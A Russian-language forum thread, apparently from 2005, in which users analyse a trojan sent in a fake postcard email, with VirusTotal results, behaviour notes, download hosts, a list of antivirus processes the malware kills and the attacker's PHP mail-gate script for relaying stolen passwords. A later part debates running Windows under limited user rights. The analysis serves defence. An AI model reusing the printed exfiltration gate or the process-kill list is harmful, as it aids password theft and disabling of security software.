Внимание, открытка!

[Geser]

Сегодня получил такое письмо:

Добрый день!
Вам была отправлена открытка. Для того, чтобы получить ее,
нужно зайти по ссылке

hxxp://postcard.pp.ru/e64ed88dc8908cdd27532&/get/card.scr

и нажать на кнопку "Открыть".
Открытка будет доступна в течение двенадцати месяцев.

Служба рассылки открыток
http://www.postcard.ru/

----------------------------------------------------------------
Чтобы не забывать поздравлять своих знакомых с днем рождения, вам достаточно теперь зайти в раздел
"Напомнить" на сервере, и POSTCARD.RU вам не даст забыть об именинниках. Количество знакомых не ограничено!
----------------------------------------------------------------
Все о туризме и отдыхе на www.alfatravel.ru! Тел.: (095)202-42-04
----------------------------------------------------------------
Не хватает места в почтовом ящике? Тогда специально для Вас - почтовый сервис uMail.ru. Пользователи uMail.ru
могут самостоятельно настраивать размер своих почтовых ящиков. uMail.ru - гарантия сохранности Вашей
корреспонденции. Подробнее: http://umail.ru
----------------------------------------------------------------

Hello!
You've got a postcard. To view this postcard, click on the
following link at anytime within the next 365 days

hxxp://postcard.pp.ru/e64ed88dc8908cdd27532&/get/card.scr

then switch to english version of site, and click on "get my postcard!"

Greeting postcards at
http://www.postcard.ru/

По указанному адресу находится

Код:

This is a report processed by VirusTotal on 12/17/2005 at 13:14:17 (CET) after scanning the file "card.scr" file.
Antivirus Version Update Result 
AntiVir 6.33.0.61 12.16.2005 no virus found 
Avast 4.6.695.0 12.16.2005 no virus found 
AVG 718 12.15.2005 no virus found 
Avira 6.33.0.61 12.16.2005 no virus found 
BitDefender 7.2 12.17.2005 BehavesLike:Trojan.FirewallBypass 
CAT-QuickHeal 8.00 12.16.2005 (Suspicious) - DNAScan 
ClamAV devel-20051108 12.16.2005 no virus found 
DrWeb 4.33 12.16.2005 no virus found 
eTrust-Iris 7.1.194.0 12.17.2005 no virus found 
eTrust-Vet 12.3.3.0 12.16.2005 no virus found 
Fortinet 2.54.0.0 12.17.2005 suspicious 
F-Prot 3.16c 12.15.2005 no virus found 
Ikarus 0.2.59.0 12.17.2005 no virus found 
Kaspersky 4.0.2.24 12.17.2005 Email-Worm.Win32.Monikey.j 
McAfee 4652 12.16.2005 no virus found 
NOD32v2 1.1326 12.16.2005 no virus found 
Norman 5.70.10 12.16.2005 W32/Downloader 
Panda 8.02.00 12.16.2005 no virus found 
Sophos 4.01.0 12.16.2005 no virus found 
Symantec 8.0 12.17.2005 no virus found 
TheHacker 5.9.1.057 12.16.2005 no virus found 
VBA32 3.10.5 12.16.2005 suspected of Trojan-PSW.LdPinch.12

Как видно большинство антивирусов пока этого червячка не знают

[MOCT]

Как видно большинство антивирусов пока этого червячка не знают

а это и не червячок, а банальный троян.

[Firza]

Как и большинство вирусов, данный вирус не соответствует правилам Designed for Microsoft Windows XP. Главное несоответствие – вирус не работает без прав Administrator на Windows 2000/XP (NTFS), а это значит, что он не опасен тем, которые работают с правами “Limited User”.
Проводил эксперимент с данным вирусом с правами “Limited User”:
После запуска card.scr он создает файл 1(1).exe в папке %UserProfile%\Local Settings\Temporary Internet Files\Content.IE5\ и после этого он пытается скопировать файл 1(1).exe как C:\ntldr.exe но данное действие недоступно с правами “Limited User”. На этом процесс вируса заканчивается.
Если все-таки разрешит вирусу создавать файлы в коренном каталоге системного диска, то card.scr создает файл C:\ntldr.exe и запускает его. Выскакивает надпись: “This software protected with UNREGISTRED copy of EXECryptor!”. После нажатие OK, программа завершает свою работу, не причинив некого вреда, и не внося, какие либо изменение в другие файлы и Registry. Вирус пытался добавить ключ в HKLM но данное действие недоступно без прав Administrator.

[Geser]

Если это действительно модификация Пинча, то все пароли уже тю тю...

[MOCT]

Если это действительно модификация Пинча, то все пароли уже тю тю...

в одном месте написано "XinchUser", а в другом ставит стартовую страницу посвященную pinch'у. но это действительно из семейства *inch.

p.s. кто-нибудь распаковал файл 1.exe, который скачивает этот downloader?

[Firza]

Небольшое исправление:
Файл card.scr не создает C:\ntldr.exe он его скачивает из hxxp://parfum-club.ru/1.exe

Чтобы вирус мог добыть пароли пользователя он должен работать как keylogger или искать их конфигурационных файлах программ или в Regitry. Как keylogger он точно не работает, так как погибает зразу после запуска а в Registy он даже не пытается что-то искать – нет обращений к ключам где могли бы находится зашифрованные пароли пользователя.

[HATTIFNATTOR]

там же: 2.exe 5.exe

[Geser]

Небольшое исправление:
Файл card.scr не создает C:\ntldr.exe он его скачивает из hxxp://parfum-club.ru/1.exe
Чтобы вирус мог добыть пароли пользователя он должен работать как keylogger или искать их конфигурационных файлах программ или в Regitry. Как keylogger он точно не работает, так как погибает зразу после запуска а в Registy он даже не пытается что-то искать – нет обращений к ключам где могли бы находится зашифрованные пароли пользователя.

Ну не знаю, может это кривой экземпляр. Стандартный Пинч украдёт все пароли из под ограниченного пользователя без проблем т.к. он их читает из реестра и с диска. Смотря к чему пароли

[MOCT]

Небольшое исправление:
Файл card.scr не создает C:\ntldr.exe он его скачивает из hxxp://parfum-club.ru/1.exe

совершенно верно

Чтобы вирус мог добыть пароли пользователя он должен работать как keylogger или искать их конфигурационных файлах программ или в Regitry. Как keylogger он точно не работает, так как погибает зразу после запуска а в Registy он даже не пытается что-то искать – нет обращений к ключам где могли бы находится зашифрованные пароли пользователя.

вся работа файла card.scr - отправляет почту с логом c:\boot.txt, прописывается сервисом, создает ярлык, меняет настройки фаервола, убивает процесы по списку (самое смешное - некоторые повторяются),
выкачивает 1.exe (если не путаю - упакован armadillo 4).

рассчитан на русскоязычных жертв
из-за логических ошибок работоспособен не на всех системах.

[MOCT]

там же: 2.exe 5.exe

файлик 2.exe поинтереснее будет.

Файл 2.exe упакован FSG 1.33, размер 25504 байта.
Устанавливает стартовую и поисковую страницу в Internet Explorer
Прописывается как сервис TaskMgr.
Создает ярлык со ссылкой на http://cards.mail.ru/card.html?id=b5...e422&user_id=1
Скачивает файл http://parfum-club.ru/1.exe и сохраняет как c:\y.exe
Имя пользователя - "lamer".
Меняет настройки файервола.
Собирает пароли от массы программ (как любой Pinch).
Отправляет результаты почтой на [email protected] в виде упакованного аттача.
Использует гейт по адресу http://alita-sochi.ru/mail.php

Содержит список процессов антивирусов и файерволов (и других программ) для убиения:
=== begin ===
nod32krn
NOD32KUI
VSMON
ZAPRO
APVDWIN
PAVSRV51
avpcc
WEBPROXY
navpw32
Avp32
PccPfw
ATUPDATER
ATUPDATER
AUPDATE
AUTODOWN
AUTOTRACE
AUTOUPDATE
AVPUPD
AVWUPD32
KAVPF
ва
NOD32krn
AVWUpSrv
Ahnlab
task
Scheduler
alerter
AlertManger
AVExch32Service
avg7alrt
avg7updsvc
AvgCore
AvgFsh
AvgServ
avpcc
AVPCC
AVUPDService
AvxIni
awhost32
backweb client - 4476822
=== end ===

а вот собственно и файлик mail.php:

Код:

<?
$ip=getenv("REMOTE_ADDR");
$email=$_POST['a'];
$subject=$_POST['b']."(".$ip.")";
$msg=$_POST['c'];
$tmp = $msg;
$msg=eregi_replace(" ","+",$tmp);
$headers = "Content-Type: application/octet-stream; name=\"report.bin\"\n";
$headers .= "Content-Transfer-Encoding: base64\n";
$headers .= "Content-Disposition: attachment; filename=\"report.bin\"\n";
mail($email, $subject, $msg, $headers);
?>

<!-- REQUIRED -->
<script language="JavaScript">
window.status = "_ret_ok_1";
</script></body></html>

[Geser]

Написал администрации сайтов. Надеюсь уберут и трояна и скрипт

[MOCT]

Самое смешное, что упакованный 2.exe детектируется KAV как Trojan-PSW.Win32.PdPinch.aa, а распакованный детектируется KAV как Trojan-PSW.Win32.LdPinch.sh.
Файл card.scr детектируется KAV как Email-Worm.Monikey.j (хотя сам рассылаться по почте не может). Другие файлы (1.exe, 5.exe) не детектируются.

Результаты сканирования программой VBA:
G:\card.scr : infected Email-Worm.Win32.Monikey.j
G:\card.unp : infected Email-Worm.Win32.Monikey.j
G:\1.exe : is suspected of Backdoor.xBot.13
G:\2.exe : is suspected of Backdoor.Prorat.8
G:\2.unp : is suspected of Backdoor.Prorat.8

(ProRat тут совсем не в тему...)

p.s. может у кого есть другие версии Monikey?

[Firza]

вся работа файла card.scr - отправляет почту с логом c:\boot.txt, прописывается сервисом, создает ярлык, меняет настройки фаервола, убивает процесы по списку (самое смешное - некоторые повторяются),
выкачивает 1.exe

Все эти замечательные действие (кроме создать ярлык) недоступны с правами “Limited User”, наверно по этому он у меня так и заработал. Хотя возможно упаковщику не понравилось пристальное внимание RegMon / FileMon.

Ну не знаю, может это кривой экземпляр. Стандартный Пинч украдёт все пароли из под ограниченного пользователя без проблем т.к. он их читает из реестра и с диска. Смотря к чему пароли

Данный экземпляр у меня действительно нечего не крал. Эксперимент проводился под наблюдение RegMon / FileMon и там нет нечего подозрительного, что могло свидетельствовать о намерения красть пароль. А вот файл 2.ехе действительно интересней, в нем есть попытки воровать пароли от Opera, Mozilla, Total Commander, CuteFTP, WS_FTP. В отличии от 1.exe он не погибает сразу после запуска а продолжает быть активным, но функции:
убиение антивирусов и firewall,
прописка как Service,
изменение настройки файервола,
ему недоступны без прав Administrator.

[Geser]

Все эти рассуждения про работу под пользователем хороши. Только одна проблема.
Многие программы под пользователем или не работают или страшно глючат. Так что обычно выбор такой. Или под админом с опасностью поймать трояна, или под пользователем, без троянов и без программ. Только зачем тогда вообще нужен компьютер?

[MOCT]

Все эти рассуждения про работу под пользователем хороши. Только одна проблема.
Многие программы под пользователем или не работают или страшно глючат. Так что обычно выбор такой. Или под админом с опасностью поймать трояна, или под пользователем, без троянов и без программ. Только зачем тогда вообще нужен компьютер?

под админом ставятся все дистрибутивы, известные и легальные, а потом вся работа идет под продвинутым юзером. вот такая обычно практика.

[Firza]

Все эти рассуждения про работу под пользователем хороши. Только одна проблема.
Многие программы под пользователем или не работают или страшно глючат. Так что обычно выбор такой. Или под админом с опасностью поймать трояна, или под пользователем, без троянов и без программ. Только зачем тогда вообще нужен компьютер?

В общем, то это давно уже не так, есть очень много программ, которые работают с правами “Limited User” и даже очень большие по размеру (OpenOffice, FineReader, MS Office). Так что нет рациональных причин, почему программы не могут работать без прав Administrator, есть только иррациональные – лень и привычка “программистов – Administrators” писать программы только для себе подобных таких же Administrators .
Я уже больше года как в основном работаю справами “Limited User”, и особых неудобств не испытывая, кругом только одни удобство – вирусы на нем плохо работают и очень хорошо можно обойтись без антивируса. Теперь я уже настолько заболел этим, что больше уже не вернусь в постоянную работу с правами Administrator. И если мне попадается нужная но “неправильная” программа, то лучше я потрачу несколько минут чтобы её “приручить” работать с правами “Limited User”, чем из-за одной “неправильная” программы, все остальные программы запускать с правами Administrator. В крайнем случаи “неправильную” программу можно запускать через Run As... (runas.exe) с правами Administrator.

[Firza]

под админом ставятся все дистрибутивы, известные и легальные, а потом вся работа идет под продвинутым юзером. вот такая обычно практика.

Если под “продвинутым юзером” надо понимать “Power User”, то работать под ним есть мало пользы для безопасности, правильно было бы работать под “Limited User”. Разница между правами “Administrator” и “Power User” настолько незначительные, что вообще непонятен смысл данной группы. По умолчанию “Power User” не может создавать новых пользователей и не может менять Permissions на чужие файлы и не может менять владельца чужим файлам, а все другие потенциально опасные действие ему доступны также как и Administrators.

[Geser]

В общем, то это давно уже не так, есть очень много программ, которые работают с правами “Limited User”

И еще больше таких которые не работают. Убедился на собственном опыте.

[Firza]

И еще больше таких которые не работают. Убедился на собственном опыте.

Программы которые работают с правами “Limited User” не ограничиваются только OpenOffice, FineReader и MS Office их намного больше. Из широко известных:
Opera,
FireFox,
WinRar,
7-Zip,
(почти) все программы Microsoft,
Nero.
И большинство тех программ, которые наработают легко можно научить это делать. В основном проблема неработоспособности программ под “Limited User” кроется в том, что они хранят свои настройки в той папке, где она установлена (%ProgramFiles%\Bad-program) или в Registry - HKLM, а это является прямим нарушением правил Designed for Microsoft Windows XP (весь 3. пункт). Данные место недоступны для редактирование с правами “Limited User”, по этому программы и не работают. В основном проблема решается за несколько минут путём изменений в Permissions соответствующих файлов и ключей Registry. Настроить среднестатистический офисный компьютер для работы с правами “Limited User” большего труда не составляет, можно даже запретить запускать исполняемые файлы из неположенных мест и потом можно спать спокойно – вирусов не будет, даже если пользователь будет сильно стараться их получить. Пользователи сами на рабочем компьютере не должны устанавливать какие либо программы – это работа Администратора. А в наше время полагаться на антивирусы не стоит – они уже доказали что неспособны бороться с вирусами.

[MOCT]

Программы которые работают с правами “Limited User”
...
(почти) все программы Microsoft

очень смешно.
оказывается, некоторые программы от Микрософт не работают под операционкой от Микрософт...

И большинство тех программ, которые наработают легко можно научить это делать. В основном проблема неработоспособности программ под “Limited User” кроется в том, что они хранят свои настройки в той папке, где она установлена (%ProgramFiles%\Bad-program) или в Registry - HKLM, а это является прямим нарушением правил Designed for Microsoft Windows XP (весь 3. пункт).

разработчиков, кто читал эти правила, еще поискать надо. по крайней мере в нашей стране.
на самом деле тут нужно только логическое мышление, а читать правила не обязательно. hklm это общее для всей машины, а hkcu - собственное для каждого пользователя. если подумать над тем, что не все пользователи будут работать с устанавливаемым софтом (и даже захотят видеть его в своем профиле), то логичнее писаться в current user

Настроить среднестатистический офисный компьютер для работы с правами “Limited User” большего труда не составляет, можно даже запретить запускать исполняемые файлы из неположенных мест и потом можно спать спокойно – вирусов не будет, даже если пользователь будет сильно стараться их получить. Пользователи сами на рабочем компьютере не должны устанавливать какие либо программы – это работа Администратора. А в наше время полагаться на антивирусы не стоит – они уже доказали что неспособны бороться с вирусами.

падает не только уровень поьзователей, но и уровень администраторов.
так что ручная настройка не каждому админу по плечу. (вот такой каламбур получился)